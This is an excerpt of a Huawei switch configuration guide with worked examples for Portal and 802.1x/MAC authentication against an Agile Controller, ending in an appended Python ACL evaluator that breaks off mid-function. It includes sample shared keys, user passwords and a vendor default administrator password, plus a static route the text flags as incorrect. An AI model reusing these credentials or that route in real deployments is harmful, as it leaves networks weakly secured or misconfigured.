[Figure: the Internet and the pre-authentication domain (Agile Controller including Portal and RADIUS servers, DNS server, web server) sit behind the core switch; the aggregation switch SwitchC (GE1/0/1, GE1/0/2, GE1/0/3) is the authentication point and also connects the post-authentication domain (code configuration base, issue tracking system); access switches SwitchA and SwitchB (GE0/0/1, GE0/0/2) connect the R&D Dept. and Marketing Dept. PCs and laptop.]

VLAN Plan

Table 10-18 VLAN plan

VLAN ID | Function
101 | VLAN for R&D employees
102 | VLAN for marketing employees
103 | VLAN to which interfaces connecting to the servers belong

Network Data Plan

Table 10-19 Network data plan

Item | Data | Description
Access switch (connecting to the R&D department) | Interface number: GE0/0/1; VLAN: 101 | Connects to employees' PCs.
Access switch (connecting to the R&D department) | Interface number: GE0/0/2; VLAN: 101 | Connects to the aggregation switch.
Access switch (connecting to the marketing department) | Interface number: GE0/0/1; VLAN: 102 | Connects to employees' PCs.
Access switch (connecting to the marketing department) | Interface number: GE0/0/2; VLAN: 102 | Connects to the aggregation switch.
Aggregation switch | Interface number: GE1/0/1; VLAN: 101 | Connects to the access switch of the R&D department.
Aggregation switch | VLANIF101 IP address: 192.168.0.1 | Functions as the gateway for R&D employees.
Aggregation switch | Interface number: GE1/0/2; VLAN: 102 | Connects to the access switch of the marketing department.
Aggregation switch | VLANIF102 IP address: 192.168.1.1 | Functions as the gateway for marketing employees.
Aggregation switch | Interface number: GE1/0/3; VLAN: 103 | Connects to the enterprise server area.
Aggregation switch | VLANIF103 IP address: 172.16.1.254 | Functions as the gateway for servers.
Server | Agile Controller (RADIUS server + Portal server) IP address: 172.16.1.1 | -
Server | DNS server IP address: 172.16.1.2 | -
Server | Web server IP address: 172.16.1.3 | -
Server | Code library IP address: 172.16.1.4 | -
Server | Issue tracking system IP address: 172.16.1.5 | -

Service Data Plan

Table 10-20 Service data plan

Item | Data | Description
Aggregation switch | Number of the ACL for R&D employees' post-authentication domain: 3001 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Aggregation switch | Number of the ACL for marketing employees' post-authentication domain: 3002 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Aggregation switch | Authentication server: IP address 172.16.1.1; port number 1812; RADIUS shared key Admin@123. Accounting server: IP address 172.16.1.1; port number 1813; RADIUS shared key Admin@123; accounting interval 15. Portal server: IP address 172.16.1.1; port number that the switch uses to process Portal protocol packets: 2000; destination port number in the packets that the switch sends to the Portal server: 50200; Portal authentication shared key: Admin@123 | The Service Controller (SC) of the Agile Controller integrates the RADIUS server and Portal server. Therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are the SC's IP address. Configure a RADIUS accounting server to collect user login and logout information. The port numbers of the authentication server and accounting server must be the same as the authentication and accounting port numbers of the RADIUS server. Configure an authorization server to enable the RADIUS server to deliver authorization rules to the switch. The RADIUS shared key of the authorization server must be the same as those of the authentication server and accounting server.
Agile Controller | Host name: access.example.com | Users can use the domain name to access the Portal server.
Agile Controller | Device IP address: 172.16.1.254 | -
Agile Controller | Authentication port: 1812 | -
Agile Controller | Accounting port: 1813 | -
Agile Controller | RADIUS shared key: Admin@123 | The RADIUS shared key must be the same as that configured on the switch.
Agile Controller | Port number that the Portal server uses to receive packets: 50200 | -
Agile Controller | Portal shared key: Admin@123 | It must be the same as the Portal authentication shared key configured on the switch.
Agile Controller | Department: R&D; user: A; account: A-123; password: Huawei123. Department: Marketing; user: B; account: B-123; password: Huawei123 | Two departments and two corresponding accounts have been created on the Agile Controller: R&D department and an R&D employee account A-123; Marketing department and a marketing employee account B-123.
Pre-authentication domain | Agile Controller (including RADIUS server and Portal server), DNS server, and web server | -
Post-authentication domain | R&D employees: code library, issue tracking system, and Internet. Marketing employees: Internet | -

Configuration Roadmap
1. Configure the access switch and aggregation switch to ensure network connectivity.
2. Configure Portal authentication on the aggregation switch to implement user access
control. Configure parameters for connecting to the RADIUS server and those for
connecting to the Portal server, enable Portal authentication, and configure network
access rights for the pre-authentication domain and post-authentication domain.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add user accounts to the Agile Controller.
c. Add a switch to the Agile Controller and configure related parameters to ensure
normal communication between the Agile Controller and switch.
d. Add authorization results and authorization rules to grant different access rights to
R&D employees and marketing employees after they are successfully authenticated.


Procedure
Step 1 Configure the access switch to ensure network connectivity.
The following provides the configuration for SwitchA, the access switch connecting to the
R&D department. The configuration for SwitchB, the access switch connecting to the
marketing department, is similar.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 101
[SwitchA-vlan101] quit
[SwitchA] interface gigabitethernet 0/0/1 //Interface connected to the R&D
department
[SwitchA-GigabitEthernet0/0/1] port link-type access
[SwitchA-GigabitEthernet0/0/1] port default vlan 101
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2 //Interface connected to the
aggregation switch
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 101
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] quit
<SwitchA> save //Save the configuration.

Step 2 Configure the aggregation switch.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] dhcp enable //Enable the DHCP service.
[SwitchC] vlan batch 101 to 103
[SwitchC] interface gigabitethernet 1/0/1 //Interface of the access switch
connected to the R&D department
[SwitchC-GigabitEthernet1/0/1] port link-type trunk
[SwitchC-GigabitEthernet1/0/1] port trunk pvid vlan 101
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101
[SwitchC-GigabitEthernet1/0/1] quit
[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] ip address 192.168.0.1 255.255.255.0 //IP address
segment assigned to R&D employees
[SwitchC-Vlanif101] dhcp select interface
[SwitchC-Vlanif101] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif101] quit
[SwitchC] interface gigabitethernet 1/0/2 //Interface of the access switch
connected to the marketing department
[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk pvid vlan 102
[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[SwitchC-GigabitEthernet1/0/2] quit
[SwitchC] interface vlanif 102
[SwitchC-Vlanif102] ip address 192.168.1.1 255.255.255.0 //IP address
segment assigned to marketing employees.
[SwitchC-Vlanif102] dhcp select interface
[SwitchC-Vlanif102] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif102] quit
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the
server area
[SwitchC-GigabitEthernet1/0/3] port link-type access
[SwitchC-GigabitEthernet1/0/3] port default vlan 103
[SwitchC-GigabitEthernet1/0/3] quit
[SwitchC] interface vlanif 103
[SwitchC-Vlanif103] ip address 172.16.1.254 255.255.255.0 //Configure the
gateway address for the server area.
[SwitchC-Vlanif103] quit
[SwitchC] quit
<SwitchC> save //Save the configuration.


2. Configure parameters for connecting to the RADIUS server.


<SwitchC> system-view
[SwitchC] radius-server template policy //Create the RADIUS server
template policy.
[SwitchC-radius-policy] radius-server authentication 172.16.1.1 1812 source
ip-address 172.16.1.254 //Configure the IP address and port number of the
RADIUS authentication server.
[SwitchC-radius-policy] radius-server accounting 172.16.1.1 1813 source ip-
address 172.16.1.254 //Configure the IP address and port number of the
RADIUS accounting server.
[SwitchC-radius-policy] radius-server shared-key cipher Admin@123 //Set
the authentication key and accounting key to Admin@123.
[SwitchC-radius-policy] quit
[SwitchC] aaa //Enter the AAA view.
[SwitchC-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchC-aaa-authen-auth] authentication-mode radius //Set the
authentication mode to RADIUS.
[SwitchC-aaa-authen-auth] quit
[SwitchC-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchC-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchC-aaa-accounting-acco] accounting realtime 15 //Set the real-time
accounting interval to 15 minutes.
[SwitchC-aaa-accounting-acco] quit
[SwitchC-aaa] domain portal //Configure a domain.
[SwitchC-aaa-domain-portal] authentication-scheme auth //Bind the
authentication scheme auth to the domain.
[SwitchC-aaa-domain-portal] accounting-scheme acco //Bind the accounting
scheme acco to the domain.
[SwitchC-aaa-domain-portal] radius-server policy //Bind the RADIUS server
template policy to the domain.
[SwitchC-aaa-domain-portal] quit
[SwitchC-aaa] quit
[SwitchC] domain portal //Configure portal as the global default domain.

3. Configure parameters for connecting to the Portal server.


[SwitchC] web-auth-server portal_huawei //Configure the Portal server
template portal_huawei.
[SwitchC-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
Portal server IP address.
[SwitchC-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
IP address that the switch uses to communicate with the Portal server.
[SwitchC-web-auth-server-portal_huawei] port 50200 //Set the destination
port number in the packets that the switch sends to the Portal server to
50200, which is the same as the port number that the Portal server uses to
receive packets. The default destination port number on the switch is 50100,
and you must change it to 50200 manually, so that it matches the port number
on the Portal server.
[SwitchC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
Configure the shared key for communication with the Portal server, which must
be the same as that configured on the Portal server.
[SwitchC-web-auth-server-portal_huawei] url http://access.example.com:8080/
portal //Configure the URL of the Portal authentication page, in which
access.example.com is the host name of the Portal server. A domain name is
recommended in the URL so that the Portal authentication page can be pushed to
users faster and more securely. To use the domain name in the URL, configure the
mapping between access.example.com and the Portal server IP address on the DNS
server in advance. The example uses plain HTTP; if the Portal server offers
HTTPS, use an https:// URL so that the credentials users type into the login
page are not sent in cleartext.
[SwitchC-web-auth-server-portal_huawei] quit
[SwitchC] web-auth-server listening-port 2000 //Configure the port on which
the switch listens for Portal protocol packets from the Portal server. The
default port number is 2000. If the port number is changed on the server,
change it accordingly on the switch.
[SwitchC] portal quiet-period //Enable the quiet function for Portal
authentication users. If the number of times that a Portal authentication
user fails to be authenticated within 60 seconds exceeds the specified value,
the device discards the user's Portal authentication request packets for the
quiet period, so that frequent authentication failures (including password
guessing against the Portal page) do not load the switch or the RADIUS server.
[SwitchC] portal quiet-times 5 //Configure the maximum number of
authentication failures within 60 seconds before the device quiets a Portal
authentication user.
[SwitchC] portal timer quiet-period 240 //Set the quiet period to 240
seconds.

4. Enable Portal authentication and configure network access rights for users in the pre-
authentication domain and post-authentication domain.
# Set the NAC mode to unified.
[SwitchC] authentication unified-mode //Set the NAC mode to unified. By
default, the switch works in unified mode. After changing the NAC mode from
common to unified, save the configuration and restart the switch to make the
configuration take effect.

# Configure a Portal access profile.


[SwitchC] portal-access-profile name web1
[SwitchC-portal-access-profile-web1] web-auth-server portal_huawei direct
[SwitchC-portal-access-profile-web1] quit

# Configure an authentication-free rule profile and specify network access rights for
users in the pre-authentication domain.
[SwitchC] free-rule-template name default_free_rule
[SwitchC-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2
mask 255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the DNS server before
the authentication.
[SwitchC-free-rule-default_free_rule] free-rule 2 destination ip 172.16.1.3
mask 255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the web server before
the authentication.
[SwitchC-free-rule-default_free_rule] quit

# Configure an authentication profile.


[SwitchC] authentication-profile name p1
[SwitchC-authen-profile-p1] portal-access-profile web1 //Bind the Portal
access profile web1.
[SwitchC-authen-profile-p1] quit

# Enable Portal authentication.


[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] authentication-profile p1 //Enable Portal
authentication on the interface connecting to the R&D department.
[SwitchC-Vlanif101] quit
[SwitchC] interface vlanif 102
[SwitchC-Vlanif102] authentication-profile p1 //Enable Portal
authentication on the interface connecting to the marketing department.
[SwitchC-Vlanif102] quit

# Configure network access rights for the post-authentication domain.


[SwitchC] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchC-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchC-acl-adv-3001] quit
[SwitchC] acl 3002 //Configure the post-authentication domain for
marketing employees.
[SwitchC-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent
marketing employees from accessing the code library.
[SwitchC-acl-adv-3002] rule 2 deny ip destination 172.16.1.5 0 //Prevent
marketing employees from accessing the issue tracking system.
[SwitchC-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
access other resources.
[SwitchC-acl-adv-3002] quit
[SwitchC] quit
<SwitchC> save //Save the configuration.

Step 3 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.
Address Format | Description
https://Agile Controller-IP:8443 | In the address, Agile Controller-IP indicates
the Agile Controller IP address.
Agile Controller IP address | If port 80 is enabled during installation, you
can access the Agile Controller by simply entering its IP address without the
port number. The Agile Controller address will automatically change to
https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create departments and accounts. The following describes how to create the R&D
department. Create the Marketing department similarly.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.
c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.
d. Click the account management icon in the Operation column on the right of
user A. The Account Management page is displayed. Click Add, and create a
common account A-123 with the password Huawei123.
e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.

3. Add a switch to the Agile Controller and configure related parameters to ensure normal
communication between the Agile Controller and switch.
a. Choose Resource > Device > Device Management.
b. Click Add.
c. Configure parameters for the switch.
Parameter | Value | Description
Name | SW | -
IP Address | 172.16.1.254 | The interface must be able to communicate with
the SC.
Device series | Huawei Quidway Series | -
Authentication Key | Admin@123 | It must be the same as the shared key of the
RADIUS authentication server configured on the switch.
Charging Key | Admin@123 | It must be the same as the shared key of the
RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the
real-time accounting interval configured on the switch.
Port | 2000 | This is the port that the switch uses to communicate with the
Portal server. Retain the default value.
Portal Key | Admin@123 | It must be the same as the Portal shared key
configured on the switch.
Allowed IP Addresses | 192.168.0.1/24; 192.168.1.1/24 | -

d. Click OK.
4. Configure employee authorization. This example describes how to configure R&D
employee authorization. The configuration procedure for marketing employees is the
same, except that the network resources the two types of employees can access are
different.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result, and configure resources that R&D employees can access
after authentication and authorization.

Parameter | Value | Description
Name | R&D employee post-authentication domain | -
Service Type | Access Service | -
ACL Number/AAA User Group | 3001 | The ACL number must be the same as the
number of the ACL configured for R&D employees on the switch.
b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule, and specify the authorization conditions for R&D employees.
Parameter | Value | Description
Name | R&D employee authorization rule | -
Service Type | Access User | -
Department | R&D | -
Authorization Result | R&D employee post-authentication domain | -
Step 4 Verify the configuration.


l Employees can access only the Agile Controller, DNS, and web servers before
authentication.
l The Portal authentication page is pushed to an employee when the employee attempts to
visit an Internet website. After the employee enters the correct account and password, the
requested web page is displayed.
l R&D employee A can access the Internet, code library, and issue tracking system after
authentication. Marketing employee B can access the Internet but not the code library
and issue tracking system after authentication.
l After an employee is authenticated, run the display access-user command on the switch.
The command output shows that the employee is online.

----End

Configuration Files
# Configuration file of the access switch for the R&D department
#
sysname SwitchA
#
vlan batch 101
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
return

# Configuration file of the access switch for the marketing department


#
sysname SwitchB
#
vlan batch 102
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 102
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
return

# Configuration file of the aggregation switch


#
sysname SwitchC
#
vlan batch 101 to 103
#
authentication-profile name p1
portal-access-profile web1
#
domain portal
#
dhcp enable
#
radius-server template policy
radius-server shared-key cipher %#%#lJIB8CQ<:A;x$h2V5+;+C>HwC+@XAL)ldpQI}:$X%#%#
radius-server authentication 172.16.1.1 1812 source ip-address 172.16.1.254
weight 80
radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 1 deny ip destination 172.16.1.4 0
rule 2 deny ip destination 172.16.1.5 0
rule 3 permit ip
#
free-rule-template name default_free_rule
free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255
#
web-auth-server portal_huawei
server-ip 172.16.1.1
port 50200
shared-key cipher %#%#q9a^<=Ct5'=0n40/1g}/m6Mo,U9u5!s(GYM}Z{<~%#%#
url http://access.example.com:8080/portal
source-ip 172.16.1.254
#
portal-access-profile name web1
web-auth-server portal_huawei direct
#
aaa
authentication-scheme auth
authentication-mode radius
accounting-scheme acco
accounting-mode radius
accounting realtime 15
domain portal
authentication-scheme auth
accounting-scheme acco
radius-server policy
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
authentication-profile p1
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
authentication-profile p1
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif103
ip address 172.16.1.254 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 101
port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 102
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 103
#
portal quiet-period
portal timer quiet-period 240
portal quiet-times 5
#
return

10.6.3 Example for Configuring 802.1x and MAC Address Authentication to Control
Internal User Access to the Enterprise Network (Authentication Point on
Aggregation Switch)
Overview
On a NAC network, 802.1x, MAC address, and Portal authentication can be configured
on the user access interfaces of a device to meet different authentication
requirements, and a user can access the network through any of the enabled modes.

If multiple authentication modes are enabled on an interface, they take effect in
the order in which they are configured. Users authenticated in different modes
can also be assigned different network access rights by the device.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
NOTE
To know details about software mappings, see Version Mapping Search for Huawei
Campus Switches.
l Huawei's Agile Controller in V100R001C00 functions as the RADIUS server in this
example. For the Agile Controller, the minimum version required is V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS server to pass. You do not need
to configure authentication-free rules for the server on the switch.
l If NAC authentication is enabled on an interface, the following commands cannot
be used on the same interface.

Command | Function
mac-limit | Sets the maximum number of MAC addresses that can be learned by an
interface.
mac-address learning disable | Disables MAC address learning on an interface.
port link-type dot1q-tunnel | Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan / port vlan-mapping vlan inner-vlan |
Configures VLAN mapping on an interface.
port vlan-stacking | Configures selective QinQ.
port-security enable | Enables interface security.
mac-vlan enable | Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable | Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
Enterprises have high requirements on network security. To prevent unauthorized access and
protect information security, an enterprise requests users to pass identity authentication and
security check before they access the enterprise network. Only authorized users are allowed to
access the enterprise network.
In addition, dumb terminals, such as IP phones and printers, must also pass
authentication before they can access the enterprise network.
The enterprise network has the following characteristics:
l The access switches on the network do not support 802.1x authentication.
l The enterprise network is small and has no branch networks.
l The enterprise has no more than 1000 employees. A maximum of 2000 users,
including guests, access the network every day.
l Dumb terminals, such as IP phones and printers, are connected to the enterprise
network.
To reduce the investment in network reconstruction, you are advised to configure
802.1x authentication on the aggregation switch and connect a single centralized
authentication server to the aggregation switch in bypass mode. Dumb terminals,
which run no 802.1x client, use MAC address authentication.

Figure 10-41 Wired access networking diagram
(Diagram: the Agile Controller server (SM, SC and DB, 192.168.100.100) forms the
pre-authentication domain and the service server holding key network resources
(192.168.102.100) forms the post-authentication domain; both sit behind the core
layer, which SwitchA reaches through GE1/0/6, with GE1/0/5 toward the campus
egress and the Internet. SwitchA, the aggregation-layer authentication point,
connects to access switches SwitchC on GE1/0/1 and SwitchD on GE1/0/2, each via
its own GE0/0/3. A fixed terminal and a dumb terminal hang off GE0/0/1 and
GE0/0/2 of each access switch; 802.1x authentication packets and MAC
authentication packets flow from the terminals up to SwitchA.)

Data Plan

Table 10-21 Network data plan

Item | Data
Agile Controller | IP address: 192.168.100.100
Post-authentication domain server | IP address: 192.168.102.100
Aggregation switch (SwitchA) | l VLAN to which GE1/0/6, connected to the server,
belongs: VLAN 100
l VLAN to which downstream interfaces GE1/0/1 and GE1/0/2 belong: VLAN 200
Access switch (SwitchC) | User VLAN ID: 200
Access switch (SwitchD) | User VLAN ID: 200

Table 10-22 Aggregation switch service data plan

Item | Data
RADIUS scheme | l Authentication server IP address: 192.168.100.100
l Authentication server port number: 1812
l Accounting server IP address: 192.168.100.100
l Accounting server port number: 1813
l Shared key for the RADIUS server: Huawei@2014
l Accounting interval: 15 minutes
l Authentication domain: isp
ACL number of the post-authentication domain | 3002

Table 10-23 Agile Controller service data plan

Item | Data
Department | R&D department
Access user | User name: A; wired access account: A-123; password: Huawei123
Device group | Wired device group: Switch
Switch IP address | SwitchA: 192.168.10.10
RADIUS authentication key | Huawei@2014
RADIUS accounting key | Huawei@2014

Configuration Roadmap
1. Configure the aggregation switch, including the VLANs that interfaces belong
to, parameters for connecting to the RADIUS server, NAC authentication, and
access rights to the post-authentication domain.
NOTE
Ensure that routes are reachable between the access switches (SwitchC and
SwitchD), the aggregation switch (SwitchA), and the Agile Controller server.
2. Configure the access switches, including the VLANs and 802.1x transparent
transmission.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add an account to the Agile Controller.
c. Add switches to the Agile Controller.
d. Configure authentication rules, authorization results, and authorization
rules on the Agile Controller.

Procedure
Step 1 Configure the aggregation switch.
1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200
[SwitchA] interface gigabitethernet 1/0/1 //Configure the interface
connected to SwitchC.
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 200
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2 //Configure the interface
connected to SwitchD.
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 200
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/6 //Configure the interface
connected to the server.
[SwitchA-GigabitEthernet1/0/6] port link-type trunk
[SwitchA-GigabitEthernet1/0/6] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet1/0/6] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 192.168.10.10 24 //Configure the management
IP address for SwitchA. This IP address is used when SwitchA is added to
Agile Controller.
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 192.168.200.1 24 //Configure the gateway
address for terminal users.
[SwitchA-Vlanif200] quit
[SwitchA] ip route-static 192.168.100.0 255.255.255.0 192.168.10.10 //
Configure a route to the network segment where the pre-authentication domain
resides. The next hop must be the address of the core-layer device on VLAN
100, not SwitchA's own Vlanif100 address; the example shows 192.168.10.10
here, which a real deployment must replace with the core-layer address.
[SwitchA] ip route-static 192.168.102.0 255.255.255.0 192.168.10.10 //
Configure a route to the network segment where the post-authentication domain
resides, with the same next hop.

2. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.
# Create and configure the RADIUS server template rd1.
[SwitchA] radius-server template rd1
[SwitchA-radius-rd1] radius-server authentication 192.168.100.100 1812
[SwitchA-radius-rd1] radius-server accounting 192.168.100.100 1813
[SwitchA-radius-rd1] radius-server shared-key cipher Huawei@2014
[SwitchA-radius-rd1] quit

# Create an AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchA] aaa
[SwitchA-aaa] authentication-scheme abc
[SwitchA-aaa-authen-abc] authentication-mode radius
[SwitchA-aaa-authen-abc] quit

# Configure an accounting scheme acco1. Set the accounting mode to RADIUS so that
the RADIUS server can maintain account status, such as login, log-off and forced log-
off.
[SwitchA-aaa] accounting-scheme acco1
[SwitchA-aaa-accounting-acco1] accounting-mode radius
[SwitchA-aaa-accounting-acco1] accounting realtime 15 //Set the real-time
accounting interval to 15 minutes.
[SwitchA-aaa-accounting-acco1] quit

# Create an authentication domain isp, and bind the AAA authentication scheme abc,
accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchA-aaa] domain isp
[SwitchA-aaa-domain-isp] authentication-scheme abc
[SwitchA-aaa-domain-isp] accounting-scheme acco1
[SwitchA-aaa-domain-isp] radius-server rd1
[SwitchA-aaa-domain-isp] quit
[SwitchA-aaa] quit

# Configure the global default domain isp. During access authentication, enter a user
name in the format user@isp to perform AAA authentication in the domain isp. If the
user name does not contain a domain name or contains an invalid domain name, the user
is authenticated in the default domain.
[SwitchA] domain isp

3. Enable 802.1x and MAC address authentication.


# Set the NAC mode to unified.
[SwitchA] authentication unified-mode

NOTE

By default, the unified mode is enabled. After the NAC mode is changed, save the configuration and
restart the device to make the configuration take effect.

# Configure a MAC access profile.


[SwitchA] mac-access-profile name m1
[SwitchA-mac-access-profile-m1] mac-authen username fixed A-123 password
cipher Huawei123 //Set the user name mode for MAC address authentication
to fixed user name, with user name A-123 and password Huawei123. With a
fixed user name, every terminal on the interface that does not answer 802.1x
is authenticated with this one account, so the RADIUS server cannot tell one
dumb terminal from another, and a MAC address can be spoofed by any device
plugged into the same port. Limit the rights granted to this account to what
the dumb terminals need, or use the MAC-address user name mode so that the
server can authorize each terminal's MAC address individually.
[SwitchA-mac-access-profile-m1] quit

# Configure an 802.1x access profile.


NOTE

By default, an 802.1x access profile uses the EAP authentication mode. Ensure that the RADIUS server
supports EAP; otherwise, the server cannot process 802.1x authentication request packets.
[SwitchA] dot1x-access-profile name d1
[SwitchA-dot1x-access-profile-d1] quit

# Configure an authentication profile.


[SwitchA] authentication-profile name p1
[SwitchA-authen-profile-p1] mac-access-profile m1 //Bind the MAC access
profile m1.
[SwitchA-authen-profile-p1] dot1x-access-profile d1 //Bind the 802.1x
access profile d1.
[SwitchA-authen-profile-p1] quit

# Enable 802.1x authentication and MAC address authentication on GE1/0/1 and


GE1/0/2.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] authentication-profile p1 //Bind the
authentication profile p1 and enable 802.1x + MAC address combined
authentication.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] authentication-profile p1 //Bind the
authentication profile p1 and enable 802.1x + MAC address combined
authentication.
[SwitchA-GigabitEthernet1/0/2] quit

4. Configure ACL 3002 for the post-authentication domain.


[SwitchA] acl 3002
[SwitchA-acl-adv-3002] rule 1 permit ip destination 192.168.102.100 0 //
Allow authenticated users to reach the post-authentication domain server.
[SwitchA-acl-adv-3002] rule 2 deny ip destination any //Deny every other
destination; without this explicit deny, traffic that matches no rule would
not be blocked.
[SwitchA-acl-adv-3002] quit
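The post-authentication ACLs on this page (ACL 3001 and 3002 on SwitchC in the Portal example above, and ACL 3002 on SwitchA here) are evaluated rule by rule in ascending rule-number order, and the wildcard that follows a destination address is an inverse mask: 0 selects exactly one host, 0.0.0.255 a /24. The following Python script is an added example, not code from this document or from Huawei. It parses rules of the shape used on this page, evaluates them against constructed sample flows, and shows why the whitelist ACL in this example needs its explicit final deny. Treating a packet that matches no rule as permitted is an assumption, exposed as the no_match parameter so it can be changed.

```python
"""Added example: first-match evaluation of VRP-style advanced ACL rules.

Only the rule shape used on this page is parsed:
    rule N permit|deny ip [source A.B.C.D WILDCARD | source any]
                          [destination A.B.C.D WILDCARD | destination any]
The wildcard is an inverse mask: bits set to 1 are "don't care", so 0 (= 0.0.0.0)
selects exactly one host and 0.0.0.255 selects a /24.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

_RULE = re.compile(
    r"^\s*rule\s+(?P<num>\d+)\s+(?P<action>permit|deny)\s+ip"
    r"(?:\s+source\s+(?:(?P<sany>any)|(?P<src>[\d.]+)\s+(?P<swc>[\d.]+)))?"
    r"(?:\s+destination\s+(?:(?P<dany>any)|(?P<dst>[\d.]+)\s+(?P<dwc>[\d.]+)))?"
    r"\s*$"
)

Match = Optional[Tuple[int, int]]   # (address, wildcard) as 32-bit ints; None = any


@dataclass(frozen=True)
class Rule:
    number: int
    action: str          # "permit" or "deny"
    src: Match
    dst: Match


def _ip(text: str) -> int:
    return int(ipaddress.IPv4Address(text))


def _spec(addr: Optional[str], wildcard: Optional[str]) -> Match:
    if addr is None:                  # keyword absent, or "any"
        return None
    if wildcard == "0":               # VRP shorthand for 0.0.0.0 (one host)
        wildcard = "0.0.0.0"
    return (_ip(addr), _ip(wildcard))


def parse_acl(text: str) -> List[Rule]:
    """Rules of an ACL body in ascending rule-number order.
    Lines that are not 'rule ...' (the 'acl number' header, '#') are skipped."""
    rules = []
    for line in text.splitlines():
        m = _RULE.match(line)
        if m is None:
            continue
        rules.append(Rule(int(m["num"]), m["action"],
                          _spec(m["src"], m["swc"]), _spec(m["dst"], m["dwc"])))
    return sorted(rules, key=lambda r: r.number)


def wildcard_match(ip: int, base: int, wildcard: int) -> bool:
    care = ~wildcard & 0xFFFFFFFF     # bits that must equal the rule's address
    return (ip & care) == (base & care)


def evaluate(rules: List[Rule], src: str, dst: str,
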